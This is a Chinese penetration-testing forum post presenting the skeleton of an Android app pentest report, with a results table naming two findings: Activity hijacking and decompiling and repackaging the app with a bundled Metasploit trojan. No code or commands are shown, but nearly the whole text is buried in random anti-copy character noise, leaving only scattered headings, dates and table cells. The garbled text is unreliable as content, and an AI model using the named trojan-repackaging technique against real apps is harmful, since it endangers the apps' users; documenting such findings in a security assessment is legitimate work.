找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 4164|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
3 G/ s3 t9 H: Y! X, C$ r) _ 2 b6 h: ~& p+ n, O, u

$ V/ o; \1 B0 e% l$ q3 V0 [& f& E ' C/ F" E& |( q0 I% F- M: n
; L8 }7 u i; [% x, S ; ?2 S/ @ C4 Y. b* r6 u9 U

: B+ R! W# _6 P$ Y- B * n% h7 \ N" R) t8 q) M
, _3 P3 r4 t* z2 v0 e! X; j# C0 q: e2 n) u, H) q

9 C! l) O! w* E# Y 1 g! \8 q0 p& h9 N; r3 k 文档编号:                `2 D3 L, B" ^% `% J3 `; w$ G , d/ D* n& u: S J7 T

* X$ b; l0 D3 {* I1 w0 i. H9 ~" R# G% d

, q! q8 j9 {2 h" g5 f F4 J$ z! E5 h* K( M   # m% n* d- P5 {/ ~# ]) U6 X 3 h- B K" F7 l9 g& h9 g% c, U+ d$ O

+ I% v" F3 [( [8 X o / }4 w; p- y2 U" k1 [* U; f

$ |9 [$ K7 N' M" v % N) v. b% a& H; f$ |' J( A. g   4 e- l/ a8 e9 i5 ^8 J" u* I+ H 2 c( ~5 q& X" L$ c# c

9 M1 L* }' t0 N3 E9 L8 X 7 k6 y) O$ p5 C+ C7 S

* Q+ f: C. m% Q7 `" ? ! I# R8 n+ f0 J   ) e! S" t& s/ Q# c1 @. z' x$ ^ " E8 P/ Y5 G/ L: K7 x6 g9 D

- t) Z3 m) b& ~* I) V$ b$ M: { X G( z% \' P$ \/ u- S

; ?8 q. D: B5 P/ Z 4 M7 y( F# ^ j Y7 m: B8 @3 H   5 M/ x2 @% Z5 N- t: f: Q 0 G' A* [2 @- G3 T5 x

/ [% V6 L5 n3 W% Z% B/ M; O3 } 8 |0 W& ^' c5 X; y( x

9 m: R7 r" c/ g* v9 V4 C. h. c: r% {; B" {! p$ a   & L" ]4 [/ ^+ Y+ O/ g/ f( r : G! b( Q0 L' i! q! j

* C3 w; s$ `9 u- ?9 Q B* H0 E. k5 B/ r& |, ~( |

3 g+ I/ ]. z; O f; P; P+ }" r. Z: p6 v" T, s 某某某APP渗透测试 " Z! ~% a% F1 N0 r. V/ H " O# e5 P ]2 t0 S( q I6 Z& T

) e9 z9 t8 ~! o/ |! M( u( d 0 ?& c8 Y' ?; ?

. S. d- T2 H7 w0 O 1 u) v% g! ^; ~" j# s   4 {1 a& T$ H! o2 Z& I! _* {2 h A 6 Y! _# |3 r6 |- [' O

1 R! i5 ~! Z8 n / M+ I1 m! ~- r9 U. d7 L8 \* |

: P8 ^; o5 ?+ l* b6 _6 E' t 7 W5 {& H: Q1 g# W   " I" _* \( N* a# D' t2 _, t0 C( b3 t& s8 e# G

+ k+ i& a- S7 ~& d. D% B0 W2 V. x6 Q6 n5 L% K' ?

1 x1 b, P N* d $ \* p% F; R# b: T, f: B& ^) g   ( U0 P8 i- \7 t+ I& H 8 g6 Q$ P0 E" g0 |* S

' a- F8 }7 W- b! d) r! Z7 T7 O) m % n. {8 |# G' F( ]/ |2 V" p

2 R( C# [6 o2 i% n9 T6 U 8 m8 N% l X& l: ?   1 O' S* w3 ]* X$ O- o! x5 m 6 J9 f: s/ H. R7 i7 ]/ c4 Q

9 k8 \: k0 W+ k* [- d E" i4 _ ( E* I5 T$ f" E8 \1 i1 z) t5 ]6 z

. V# E/ W, ^9 i* F2 E ; a6 e4 }, J0 p8 ], Z) R 技 术 报 告 3 k% H5 v! R% f$ Q* v, y6 }( V' K( f2 V$ a+ l; H' L& N

6 L$ P B" j8 O# o G/ n% f. C $ M+ Y0 l% Q3 ~4 s, q8 P! [

# ^8 [! ~: F! _# @: U 8 V& N8 f) L* V" s7 d   " P3 l, J, m5 W$ U8 a9 x, b" H ' X/ K% d+ o% F

/ K% r- t: k, J! M; q5 P9 L8 Z+ N 3 Z: Z+ b8 }: k0 K% s

0 D( W3 O. F5 M8 z# }% ~6 @ " k" _$ @4 c- ^+ c   9 ]4 c- }. I# k) m) M8 v0 h& u% Q

8 V7 g) I6 f& _ 8 | n4 v, v5 K6 Y v

+ Q$ v1 k! r. T5 x8 N $ |2 ~$ r8 U) b; R8 t7 Z   8 h1 i$ S" ^ C8 X2 D' W ; ^5 ~: |3 J f

- |# C$ U2 d" o4 Q5 j% e0 T( k* m$ U. l" y" d7 `* U1 f( S: t3 g

& X) t1 G* v( ?5 u: Y4 k9 ^ 7 e H( B! T& B, W' k/ g: i- v   9 x+ K" e! h/ b - t+ x8 L, `; c5 Y! F) e

' c! A2 A( s* f# E9 _( y1 y8 e8 Q : u$ j c- S3 C2 B4 _* \$ J. [( Y

& ^8 V8 e, e( E9 k $ w$ p. F9 ?* T. e( y [   ! w8 ?: z% U7 d) y; ` + L7 ^4 {9 m/ I" O$ G' y) h- `

/ k J- T; G; m4 x5 r 8 h# P# U7 x; H0 d

' [. U1 R! J, O8 w3 r 1 I% W8 J$ e3 M+ B' U& }   ) E! ]. s# Z* g3 j * h9 B' ~% p/ r5 z/ P

: p4 C" T5 |7 f J& ^1 b7 {1 \# V; d: G% I

6 _+ R; t. W. m7 t / a% u+ \& y7 |6 h# l+ o, E& t   , ]1 } m: h7 {* R' K% [; ~ % c' x+ Q |" z5 f7 `8 \, T5 y* v

& |$ X# b; G9 e* D X/ C' I: u$ G1 E4 g5 C! G+ C

. }, b1 x2 ^/ C s ( P P7 o8 t0 g0 [7 p   4 f9 V1 D' @+ H; \# [# S) Z% D $ a" u$ m& @$ k

' m/ Y3 |& |5 J4 j; V1 ~) l' Y% \; h" m 6 J1 F9 j; s) z8 Y4 N6 w

! P( k4 b$ z" @$ G# y9 Q ( M# H3 I6 I' g0 y- N7 V6 P4 p   3 ?: E( k/ R' a2 Q# {/ G7 g z" ?, |3 h4 |4 a# R

- }4 N3 ?8 H- i" X : B2 A: \; P9 B4 m0 T

/ n2 Z" R8 Y% _ , M' |" }# I- n3 G$ q* U$ X. k   $ }0 P- x. ], _7 A C5 m [3 P

6 X& @% C; F! a( J; o" U& c : `% x& m9 u( k3 Q/ D

7 ~0 N' o$ Y* `9 ]9 G 8 ^( k: a8 a/ q' ~( H: e) N   ) }0 d, [ I$ x7 a0 j0 J$ p 4 E+ S# ~6 V& R5 H# d& j

9 K/ l. y- J. Q! X6 j 0 a3 x. q! y; C+ G/ F7 Q

% L/ n8 Y& ^. K$ s' |/ w q0 F4 C8 r) m" M   . N) d0 V% Z; q% g; J6 E6 b' T6 w i

0 ^9 ?& L$ ~7 C3 l* E. G1 W 7 j3 q1 Y: P# {# o/ ^ G0 v2 A: \

8 ~- R# U# C; A6 \7 h, T+ K 8 Q3 O% ?. d" N( ^   8 f4 Y3 u9 d4 l: i+ ] 4 f& R9 P& p! I3 v5 p

6 ^ e0 L; B# S7 a% Q! l8 L1 @8 x: x: p" B9 R0 \0 E

' X& z( H# \- c1 D9 s% M" V 7 g5 ^" x" {$ c+ i, u+ b   1 U% _+ }* D3 ^$ j2 o$ a5 a + N* ~" L0 f8 @" B! O

% G8 z @# B3 S$ x 5 f8 F5 G4 X* ]$ |9 c: V

1 l- i+ l8 Q/ O1 r( |: c) z/ D& ], z- D) ]% ~! o0 _" w$ H) @   : Q7 t( ?: A( a' s* s7 _ : X: V$ h6 P: {# \

4 K* b p" f! a! ?' d4 l. j* c v $ ~9 K/ R2 q, y

6 ~9 o; p# o4 N2 I, j 8 D3 u" y7 I) K$ w0 z3 m   , D' {4 a* p& w) F - k5 \6 f# l) a

6 a' P4 J% I- [+ ? 4 {+ Q2 O1 \+ P* g+ L/ E1 X! p( z

) t8 t# g V1 ^5 G 8 w+ H# M3 u) b, q* B   9 {) ?6 q/ d4 I2 J * E7 P' E3 G( G; ]

3 k& P5 n# \* B! K, Q6 W S+ t7 ]# f/ A1 `' {5 C, T- X" r

2 \9 s3 f4 {3 d/ ` 8 I) @+ Z: B( B" c% U   % R) t. d" P; f0 c+ h, X$ c. ~* r5 d* g, Y! Y! @

$ o0 R2 U7 f: @" N" ]0 i1 L- q& ~5 K n9 W. Q1 X4 o- Y

4 \+ g9 w) i. ?8 `" G1 r; `) X 3 l# z1 H8 s) m3 N2 L$ { 二〇二〇年 + M" c% b) G) Q' {3 V* l& q 5 r5 t) P7 C$ {$ W9 z: ^: E' }9 r& k L

9 j- ?4 `! b* |* [ : I( E+ b$ L( K# _
$ G' C! Y) J" Y u- R4 N $ F3 Y9 o7 q9 e+ a: Y# b x( F7 \* k6 W
. a8 f4 q, u- b: K, w. o! u7 q" U% _% B# K2 ^; N7 D1 n 7 n1 R+ M! g/ I& c) O& {8 m* e( |, o0 |/ V
) E( \! }$ k8 U2 [# n: e/ t % Y4 T/ X4 T r3 A/ ?
- I# y9 A" {" j& l* g8 a" M8 J3 x% }8 X
' D* X- R, K/ S" ~' Q8 t/ u8 i1 U' T& w& f4 \7 @; \" I, x: d 3 {- p6 L9 ]; O- D + y; }/ G& h) R6 T7 D7 i& o
1 j, l; q5 [3 M% W: { : G X/ ]$ q- j& o r5 h: N

1 R; n$ W9 B/ ? ! J3 V9 V; h" k8 S( } 目 录 ! i* c0 Y) T/ g; A" |& e \8 \% M; g

: ~8 U+ w: b* M) g5 z& d. b& O/ T. `3 C, l; W5 L $ _: N+ h/ ?' G8 \8 y& S; ~3 o4 Q- q , x+ G0 b2 H% `1 J) ]5 T, S

6 k9 g1 L! B6 U- n, L6 T% s9 N; B: e6 u7 C, D: A& K! W   4 r2 M8 P# h& \6 X& O0 Z; ~, Z2 A5 W& A6 [. e

2 W0 |8 ^, k9 V/ u" A' p0 M # G+ R& I3 N& _) M

9 y* C4 M: e& y$ V/ E - {# }) H4 g2 r: w! M7 _ 1 概述... 3 7 z0 ~) q* q5 p: o' ?% t/ G% l( u : g1 U+ u2 Z% M# n

, U; Q$ ^# n" f % P" U a s+ h- j

. [3 w+ U, }* ^- e$ Z! }' U9 F6 \. [4 O6 ` 1.2测试时间... 3 5 s8 S ]/ L# {+ e 8 z: @3 C( q% ]* S

% I9 J* @+ f' ^ 5 e4 ]7 w2 G% b0 l$ w! `4 _/ P2 G

. h( p: j6 L+ x * k6 `& O0 \ u# k! F 1.3测试对象... 3 2 ?9 G" \% q! l" V2 S $ [- u) M8 e+ C: M7 j! ^3 }

( I" C) {1 G* q/ _6 U8 [6 i% h0 W5 |& X( Q/ V0 C) _7 c; c

7 V: q7 u# w& a" t " c k& N/ }8 q4 i 1.4测试结果... 3 ' N$ i4 n9 D8 Q1 Y% ~* R/ B. u% \7 @" D$ h

. p# V# ~$ f0 b2 l& S1 T* K$ f % U! T, _, Q# ], L

4 l: u% x% o$ j1 i! p! g, W# w- ] ; F) y/ U, p7 [* s- G& o 2 检测结果... 4 5 h# t5 g/ f6 L( R, T5 i3 M& f ! X$ l) v( v# k+ B# ?8 d

' `7 U. }! m" [6 L/ I& E7 k 5 N& f5 h# `; I/ }4 C# g4 @

' F4 |0 G# I5 z! F ! l C4 t1 J* N/ Y/ X3 w4 @( V 2.1 某某某... 4 / e( F( A+ t0 G4 `0 H! X# A 2 M& I: k* p: W/ e0 H

+ g3 k; \- |* Q9 M4 z , Q& _+ P9 L' F5 L" |9 f

( \# r/ s+ d( P Y2 U0 [1 N3 t+ ?* k$ [0 j. T9 Y& @2 A 2.1.1检测目标... 4 & U$ h# O1 S& a7 _! Z4 a+ p ' T/ M% J# v" [4 W, F" u

$ c, w+ j0 R4 t- k1 t% ^ ) }5 n6 y& S" K$ u( f5 ?

0 F; H. }- r! m) V; G 1 R( S7 x* X5 i 2.1.2检测结果... 4 2 U* p9 ?2 ]9 ? * u! r; j1 J' n% C+ k2 A6 ^% g0 A

% F! I* V- G* N9 y' t* U& n5 K + E8 t. e* i% r# d

5 A) x8 u) Y& ?1 q, m5 _ C 1 b+ V. G; J7 ~5 y6 s# M4 d& D 2.1.2.1. 4 / |9 d5 ?6 W. D8 r6 p2 y* K/ Y% \( w

6 y/ ~( ]0 c( @$ S! J, @ 2 a' n9 o+ Q0 Y- z& {# [( W6 u

T u+ p7 z$ [& B {5 t$ d, X0 h$ l6 P6 C( p" t% o 2.1.2.2. 6 % a4 ~! J0 |' A$ H! A2 p / I7 x7 V0 V3 T) D p

$ v) U) [ r( h% ^( \6 u 1 {" v' w! Y* w" G% d% d3 K3 G

; i( t& }- L' J( u+ s# I r! U! a+ Z* o3 p3 r & t( q0 L+ D N" S v" a) O7 m8 _" k1 w6 F3 v" b& h* P

3 X0 P( B+ p) { % E' H9 R' Y2 ?, { / R3 i9 V, C' S6 K ! v V1 ^0 v6 G. T# k9 [8 ~5 {. V6 f! B
7 Q @ }4 m- p: w, O. u3 r: m6 T3 g) n0 f0 F8 {
) y. M/ L: x* H: y( k* L' |+ w3 Q" a9 k2 t9 ^ * Y! g7 d3 a% E$ p# K& t8 ~- X " m& F' K5 _% B S8 p( @

" @( L# {2 k3 x# P- E/ f) ~2 j& e) t% H: O, k& } 1 概述 1 R: i5 g: A6 g4 l* D* k ( a! ^: y3 v1 T- Z9 Z

; [' v4 `2 T$ Z- @$ s # e' y: E, z5 T2 d2 u0 h

! I0 S/ L8 Z" ^& o+ c; S. _( V+ R3 ~( \( l 1.2测试时间 3 J4 E3 T' H0 e1 C. c - ^" T: F/ Q1 q: j6 @

9 K' \' {# s) `( I d: {6 ]0 S , z$ V Z; _4 E: J, w+ C : z2 v8 M% |* D4 w+ T" v7 F7 h7 i; C& {6 L+ o6 g8 e8 ` h, t5 a. p% \0 @; q# P% m9 b3 p9 j$ j- x9 X9 l7 f9 w) t- I% a& _5 t5 `. B9 }+ ]* B5 Y8 G7 I$ s% q9 @5 o. Q! @2 Q1 k. O# g* L% v+ l. X; q$ N- `5 C0 ?: R) L; q/ u$ S0 ^! d" K6 o" Q5 g! G% k0 z; k; x- _6 E$ }0 @& m* i" o6 U L* x1 ?3 I" ~$ |" A+ f( r( u" }+ f, O5 E0 ]: H; f( ~9 t" E8 [5 h7 z5 g1 G7 T: U! a& {. R3 X9 U% T1 z( j0 Q7 D5 E/ O! f7 u! m/ d; a) U$ g: Z3 ~2 V; Y- z! ~6 {! F W$ Z _" G3 X: e2 c. D& t# E! `# o: ]2 I" W. s4 M; R! n5 m- X; U# k7 m8 n- k2 n! h' {! n& Q+ B/ `2 }2 h# P& E6 [8 {0 e; c8 t, }% j( ^. ]% @- c$ w' h9 P% s, Y1 c7 l- \$ C& N' r$ A+ p7 W5 s: U" b3 X
5 i3 d$ g/ |$ _ 7 r6 Y# H+ L( r# x& D9 {/ Y) h: r

) d! I# |9 y m2 _1 @ G3 | 6 Z/ w9 U7 D- V9 c2 j 渗透测试时间 8 x8 z8 ^6 d5 A7 S8 @8 b & w, m% k" O) n( q+ l9 |8 K' J+ E0 i

" d6 a o6 G% V! O# d 7 N% g& u$ J# j- P
$ J( d/ `4 U0 Q7 O' Q( A * E/ O$ G* f1 J4 r7 R

3 Y0 F0 D, Q! A5 F/ G8 q : r; u3 W. }7 w) e4 M, Q 起始时间 % X1 [: ~0 Q& V9 }1 c+ N& q4 Q c- o9 m4 ~# f' w

6 b7 w$ s0 u# d8 q8 I! w ( X' c w% x# u1 y" F 		/ z/ Z7 b- e. C) c/ n: t3 e# C1 f) _ f ' x. L A6 v) a- t* w( Z# b

" \- Q8 h, R( B+ ~ d' ?3 n1 P$ ~" n. b& l: H: v7 N 202046 6 _0 C, Z' z( i 9 x4 c, B1 p* m

4 V- d3 Y7 ~" _3 j& I( q7 n% Y% a % k" K4 P! p) X3 i! `
! k2 V! W- j8 r3 V . m4 I' z/ O8 N; N) {

F6 U+ r; U" }/ g' Z ]7 y 3 M8 `- x# ]5 f. | 结束时间 / S8 ?! j5 W! [ i9 G3 i9 `! h2 b+ H) ~& |/ P3 v2 G

1 h7 W- l0 t! |8 Z. X) R . i* y3 K0 a7 l. w+ m- k+ ^ W$ Y 		7 W6 h" L. B5 v1 r: B: ^% g1 p( a4 H# m) ~& L; B6 h A

. Z! @+ s3 Z. t. i3 i2 q/ y ' e+ K* g- M4 k1 D+ G& I 202049 9 o7 w$ F* N( j 3 U% [; Q% B, H1 {) Q- N) E% G

+ c2 h" a9 n3 `6 y( ^# Q+ Z2 c ( |9 o P* `3 G3 I8 c! T
2 `0 s; m' ^6 f6 [- i' D * J6 c# i9 A; Y# D; k' v% u5 t

2 f& A# G4 p" K) K7 x) k 6 T1 r3 F. z4 }4 n, x 1.3测试对象 , q- |4 b; { A9 x 8 z- i9 Y+ z5 N$ l' l, N* J

, l/ o4 u7 g& ?2 Q1 R) x W! x0 b% V3 d2 p' u

8 I- K! L0 E. j ' d" v! @' ]9 w 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 2 \+ T+ J v! U; C4 ~ : K( y. \7 J9 A. T

: Q) H/ n5 L1 V* v4 Q: z8 |! _ 2 L5 {1 X6 j9 O3 Z8 [! n! E) Q

" f: J" H; _8 d3 x" s, _ + m5 O4 R/ R6 N8 T+ C7 t3 o7 u; j 1-1 检测对象 " q( o2 f. N5 p X' B: [4 p% A: g% f% |! q. ]/ z

[ S, C+ }/ M( j# B! k / M8 h: ]% _( |: P) M( T % a& R8 \9 ]" z: L6 c0 g8 r; h+ p. h" u+ w6 r) @% p) D z* a: [! R! f5 r# B( r( n% u9 g6 l) R8 b* I. S$ u# L! D* n$ \+ Y. @3 O% z4 z/ |1 A% J) H: W+ h! s7 G, u- [; P7 q- A4 v& h( H' ~# O0 j: y7 G1 f9 P- z8 A" r2 ~ h6 B* C y0 o8 O% K& i7 w( L: _( _# U5 U. G" y1 ~" t; k" F# i! R) B* c! M7 V: v3 a8 m# q" t, y- M* C" X% M4 t1 y7 Z& E8 p" [& j: j, @5 i p5 l$ ^* J9 ~: D* h5 b* i& q+ B1 K. d3 i. i6 F( E4 Q+ g# | n4 J% D# t& ~6 I% {0 N/ ]# p. [1 C4 w8 @( F1 i" x+ b. g( }+ r' `" @+ h& } n# g* P: S& s& c$ i7 L1 t: E7 v, c0 a9 u9 p6 N" ~+ q/ N/ ]8 b4 r6 X! A, f3 U2 @: j' _% e' \8 J$ D2 _& Y; r1 E, u' \; _. K5 N6 o- q3 K) K S3 `: E* e' \* P& c: _2 v; V2 Q" s. X4 u% ] J. K2 A+ |( Q& o2 m7 N1 P; d
; L! k( \ c, Z' Y/ c$ U/ n) {& R * \. ]! |4 \1 L8 a/ ]

5 j) d4 C0 d2 f8 W* c$ p3 U* f. ?4 Z 序号 6 d# C" t5 ]6 g7 E1 M 5 u$ t" U2 t/ b( h1 e6 _2 E5 E

u) ^0 K7 v1 H- g % s& h+ E( K4 T F 		7 I/ u+ R$ m' y1 } 8 L9 v* {$ {! ?; ] |

1 S& l, E% b" G6 p* ?$ X ; L2 B0 h% h f" J 测试对象 4 ~6 n; w' N3 K7 X/ F& Y* \- R& f9 h/ `8 R* q# C! ]

5 J" h2 K, i3 [# w ' B: c% d3 Y/ o3 e) O1 Y& ? 		1 W. |4 d) g7 @ 6 |* `% G, h c: @6 s

, g, P. B* B, v3 p, h) P) q: D5 M# q % Z+ K- g# i% s- I 测试地址 2 M9 f; O# T% c) v. A% ?1 W ' I' N# |' O, H4 x

6 d3 Q( c7 E p6 m% |& f0 T# L; J # P: a" W; x( ? 		. G9 S% j, B8 _+ ~% i- M; L ! [ ^) D/ P. ^) A8 K0 f

1 W) o! B( f' R) D9 f! l+ t9 p e3 s+ I$ I6 `, M2 ? 安全漏洞 ; z5 q9 V Q j) f1 y+ X 7 Q* `/ B& J, T" P: J

% i% Q3 U- D7 {7 V0 e- r* b: P v, C
. e7 J2 q2 y5 m& I2 \# S/ c ! }% V$ T" |1 U! O8 c, j3 b: G

/ b2 {5 {; k# C N - [2 d1 U$ ^0 f( Q$ l 1 ( y E$ B$ H$ x9 K3 K8 f' }; K# o8 o- j0 _

% P2 M1 m+ _7 w* t' ?& f' k 8 b" \4 W4 v1 ~# x1 U 		/ O- m" d1 ^% g. n # N/ n7 e; W8 O6 H

: Z4 S6 [1 M: Y, m$ B2 A ( J+ {* [8 `+ M/ o7 h 某某某安卓APP 9 x, A+ o0 ?4 m7 M6 h* j 9 ~0 f7 o0 k& B) J8 N3 K

/ k/ Z) t+ M( w2 _) @* O& A& | + i" }6 u$ ]+ p4 d7 U( u 		: v& y1 r" C [. _" s3 s. T6 _5 u+ _ b: [" C! \) n9 O: B9 l

K+ X# W# P7 k- F } ! {5 `6 d3 y! c( s4 Y   y, I6 q4 v% R0 ]$ R 3 k* I& {5 _9 T) j

; b2 g/ L0 d I0 M9 r6 e8 h @6 ]' [ u$ }- u) Z n+ z 		0 _, I) @/ D1 _) q [/ \2 X 0 f0 \) H: t5 R4 w- M# L2 K- g

* L9 F" o' O/ j! R' n: ?! _$ ~$ S; o3 G# O* Y( h$ ]/ ] 2 % w! ^7 E* ]7 K0 y, T- ]4 h: c) r0 H$ D" |1 p

; n" N+ v( E4 L9 X) u 7 j/ L% @9 y2 N3 C+ @
1 D3 |9 M1 y$ u4 x$ y ; H& l; D/ l! O& f

0 P, d! R% g: m) W9 B9 X0 h9 `" c) n 1.4测试结果 4 h+ f) U& R& F, ?. Y) ? . x' d& c" P* T/ R" _

2 P$ C7 z. _7 _/ } ; W2 W7 J. I: A

! Z7 m7 x( B# y0 f/ U) @3 W6 O( i3 R: C3 e, P0 b5 x7 [ 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 2 T' B8 { P( f, M& L; i; \ Z+ N" V% ^5 _

& Z! Z" J" |- I _' B* I 8 O. I% x& _/ X! B6 x" L- o) m

( q- f) H9 ~* \9 N6 E& c% ^' M ' v$ K! Z( I% o/ R/ H2 r   / y/ d. M5 C( k' Q8 M S4 x1 M' q( t6 ] . ?" C" J; h' n- ?! E

8 E/ s7 e$ R: C4 j, a8 f & O P* z/ [* Q% r( O' S
- l& ?0 }. i# X* f. e5 D! h8 q: V- w3 S; X* Z; T$ @- s( Y 1 Q9 G8 Z) `4 J" _) [& L2 G0 ~6 N9 R1 w9 ?) [' C: W/ M6 t( N0 {3 o- e! n! R- B) o" j' O& l. r8 B, d: X, }/ e3 V$ y& d/ Z; N. z/ d0 I: Q9 f P( @. A3 r4 {+ a7 E7 h3 A0 Z1 A+ `' t& C' L4 M, Y, C9 Y8 K) w$ D1 }. I! i9 O9 a J0 { d* u. T$ b7 H- f5 X$ w2 c1 H" F9 M/ \" W1 E6 C; v( w) ~8 u9 D+ h5 t: W! ]5 |# N! o E: v1 h. w1 T8 H& @' S# G: q w6 D) z/ r% t4 r$ q7 j5 R+ P5 \! Q5 H+ m/ L& R( g* M# n7 K S: N. ^$ j$ \# [# H, p3 m+ y7 {3 E$ Z+ ]8 c ?) p1 k+ h p# F) e* y! M3 m# u1 u" i* b$ m* R! f b$ `' ^7 {7 Z8 f' Q" a3 X* _7 A* \. M& i$ z% X( V/ ?/ B. @8 e% ~- I3 i5 n, ^8 c2 ]5 Y2 w' q- i! r, @% T6 h, B3 j5 J0 E: A" [0 Y% ~+ r* B3 b2 \% |! d) r9 t. |1 c" f, R* V3 q% {* i! V6 |" l0 c+ y# A, i0 g" X- F! j$ f0 W" }$ \7 X/ n7 ~& v: H. n6 U. `1 q! I4 L Z2 R6 Q5 m$ y9 M& W# n% k$ U& Z/ b: x7 K* C R' S* V) `1 s3 M' D5 u# o$ `, [; p& D: f( a2 q, m* e6 X, v G I3 f, l. `, J* P7 E' [- q$ J/ [+ ?$ M3 k0 }' p2 i# Y' V; } V- D% w& F- F7 v+ c% Z; L: g- A5 s- A- F3 D) z& m! M$ M4 d" w0 \$ q+ A/ N, S7 D. e( i2 ^: `% @. G9 v: Z0 [* P2 R9 ]8 X0 O1 s2 N( H s5 t) v1 }, o. g/ ^7 K% }" u4 z" A* G, g2 Y7 i; A) t5 i: z/ u4 ]2 n# a; \
- H4 I' c8 O& g# n' S0 z - F' G' L# E4 I2 R

; P6 B6 {3 c' _. t0 S+ ^6 g7 N. @7 f0 M4 k% _; T6 A& i( _ 序号 4 }% I2 t# m% _& ^4 @+ v 0 ?0 K' B+ |0 H+ O& W

6 T9 r/ h2 g4 W( c/ u8 j J . [+ q* U" r0 } 		z8 F. D: W, h) e) V3 Y7 u ! x* K o2 U0 W' j

1 C% W3 ~5 c, v$ ~: @7 `6 O ; d9 j% x2 e) ~( _$ L 系统名称 & @% Q4 I5 t! {0 {7 Y 5 j, y; z. T" o" v. [8 `- o; F( g

2 @9 }" P6 U# L. L/ I 1 d1 @: F g' ` C( u5 X ]% v 		* F4 ?# R; i* M ) j* p. {7 D1 c: v( x

% s6 }3 E' O: H5 I/ y. O9 { 6 n" a* Z* V; L! D7 U# O; h$ M \8 ~7 s 漏洞名称 & Y* K" C$ g1 K 7 }/ M5 b% \# ~8 Y2 o5 }- \1 o

7 O% m4 X" C, {, I " [: k& R5 b6 B) c 		+ d, m7 y. K7 _ _7 t 7 O' d5 T$ O* P k/ q

6 X8 D4 a+ |- u, M9 |3 f) E ) }. f4 O' {+ t: {9 d0 f( ^ 漏洞危害 7 y2 t0 G" e. p, h" H , n! A: \, u* r( n7 w

, V, ^. V7 {7 h9 M 7 ]+ R3 w ^2 J: u% z2 t 		: ^8 E; U" o! a7 J& o % r8 ]8 ] v* N7 X

- ]# t0 |" u4 z( s! M1 K& c9 x! g ' n3 s) W; p# ~" p& M 修复结果 ! S- L2 ]4 B0 K0 C( S8 \+ N$ ^9 P! f( v1 I

& o: Y, [! l8 C- T" {2 h# ^. J2 w0 d! |$ O0 f
. H) _. u1 @9 Y/ ~ ?" @! { % D; ]% S# M2 O' F3 V% M" z3 h$ m6 [

V: ]0 t! t# v$ O: X0 N ) D( U- o0 d" f0 O* ^+ x& t 1 T& ~2 M" ~7 ^0 o2 f8 Q: w , z# v* n3 I$ `3 ]/ Z4 e q

$ f/ Q* m0 U) e4 C8 p' d4 F & k) T; z6 |" ^3 j3 Z 		' {, q2 [8 H. l& t% V+ l. x 7 J' c7 V2 r. }. j

! V; ~$ c8 d' q" f4 R0 Q( _2 R% _# e6 q 某某某某某某APP 2 K+ }' I5 \# K6 e5 c, a# B0 x/ E9 Z# s6 H( y( I" [: x

4 D D! y! a3 \ h& W ; H# E" L) F" L7 ?% {' Q! @4 G" g. s 		" z2 B. Y }6 q8 [5 _& k; A6 j 0 o w1 f2 f3 r$ i

E& X7 S* U' M9 t 2 P2 q# ?9 X' r; T$ m5 u Activity 劫持 - K; h% v+ g/ ~9 {5 K. G7 n % o$ t X; p/ g, n5 ^5 e, U: o

& {( Q+ j4 J7 B1 G s( W4 v - N% n1 S p6 B8 g4 M

! I6 d5 B6 D& Y7 T! m0 h5 T % Z' M/ T# n, @& f3 W3 n   ! `' j7 [. I8 Z* E ( ~2 P [1 G! C5 h

$ U* B1 @( E# ]. R 8 H! z/ p5 _7 ?" p& o5 [7 t 		) C$ q* z/ G1 g8 f7 h; C/ c2 ~% f $ x; ]5 X' Z4 {4 f

( [ N% H( ~% a7 Q7 S3 F6 ^" U ( g1 j: o( X1 G ; C9 [ Y) T$ p 4 m8 k9 ?6 h& K* p1 T7 n# `

, T+ z6 p# ]4 [# t- F& d/ e# W5 o 		8 t; V2 H' Y& _0 X# I# U. P* ?/ _ 3 g3 `! M; G# V

4 j- \; t/ _ N1 z 4 r4 K$ C$ V- d   ' e+ ~! |' N( T2 u1 i ( s/ |3 ~ C z$ E( ^' M6 ]! y

/ v4 |6 G9 N( t " J% X4 D' J' `! F# [6 q& F- l. z
/ d8 r: {) [2 i7 \1 ] ( y: [1 Y6 W) a% L

$ c( }; o' X; `9 Z8 @/ t/ a. N . z# u1 L/ c6 W4 w! F 2 4 T& V- t% k/ @/ i7 r K7 F+ g6 S+ X

& v* V) x1 P3 M1 [: O! q 4 P# h6 n1 A% q! @ 		0 j& \- q: x: U4 w" `/ L5 i: w0 c1 c4 A 1 u, | q/ H ~* W$ `9 Z' a, e

- ]5 w- \; n2 v: R . K0 ?& q) }% [7 r: A$ t 某某某某某某APP , s% P* D Z6 G$ g" k* O( ]2 V* N r3 a

9 g$ G( m, b& _8 v: G- n 1 `5 o7 s; O5 ^% Y 		; k4 f3 u1 Q8 m2 }3 i3 d3 F; \ , [. f) ~, Z' G4 I& Y

9 O4 Q; D' |& Y1 o% j. z * S6 [* h8 E" V1 H. `; }* M2 r, A 反编译二次打包捆绑木马、篡改APP代码 % @2 T3 h" L7 w " p& M1 H2 \* K" d

1 T5 T* x7 }1 a i/ \% Y' s 8 e T) h$ o8 O% } 		9 i& C- ^& N/ @1 M3 k4 G7 `. F3 F& {' A4 u- y* r. E' c( r

& {# Z" {! i5 d " t& o) D8 m, a; C1 H R' U3 C ! k. i7 {7 \' ]4 x$ o5 U ) s- Z, T( h, F/ G: J& O

+ r& p# C0 W$ G4 T( m B 8 M: D0 g- M5 \. m 		9 X0 h6 ?( O: f2 M) n& n) _, y2 a4 Z }" e- Y6 Q

. S$ C" D. ]9 R% {6 ?6 ^& n4 S 1 F/ w9 O* h e   + }: p, O0 h$ }3 g0 S 4 v1 j$ {( u l

% u( x2 p3 r: R5 F5 f0 k( m * t- q0 Y8 [; M; Z% T' ]9 J
. E0 J8 l/ _. r* ? . `# K' q8 V3 i/ R5 F( i
, B2 G$ {1 k( `9 k5 { 4 l. N1 m9 E5 W3 C1 `0 a/ X

